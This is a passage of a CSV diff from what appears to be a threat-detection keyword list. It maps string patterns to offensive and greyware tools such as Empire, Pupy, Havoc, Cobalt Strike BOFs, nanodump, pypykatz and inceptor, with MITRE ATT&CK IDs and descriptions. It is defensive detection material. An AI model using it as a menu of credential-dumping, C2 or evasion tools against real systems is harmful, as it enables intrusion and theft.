+"*Import powerview*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*import PupyConfig*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*import PyInstaller*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*import pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*import ShadowForgeHome*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z"
+"*import SimpleHTTPServer*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*import 
Stager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*import udmp_parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z"
+"*import wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"*import wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*import/nessus/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*import/nexpose*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*import_msf_web*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ImportDll::GetAsyncKeyState*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Import-DllImports -PEInfo *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Import-DllImports*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Import-DllInRemoteProcess*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Import-DllInRemoteProcess*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Import-Module *Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","0","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z"
+"*Inactive Domain Admins Honey Tokens*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z"
+"*inceptor*POWERSHELL*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion 
Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*inceptor.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*inceptor/obfuscators*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*inceptor-main.zip*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*include beacon.h*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*include injection.c*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*include*bofmask.h*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z"
+"*incognito* list_tokens -u*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*incognito.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*incorrect signature*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*infection_monkey.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*info@skelsecprojects.com*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*infoga.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*information_gathering_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z"
+"*infosecn1nja/SharpDoor*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z"
+"*Initial_Access.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
+"*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*InitialAccess_SpearphishingAttachment_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*initialize_fake_thread_state*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*initialize_spoofed_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*initializeShellcodeFluctuation*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*Initializing domainDumper()*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*initstring/cloud_enum*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*inject 1337 /*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*inject shellcode*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
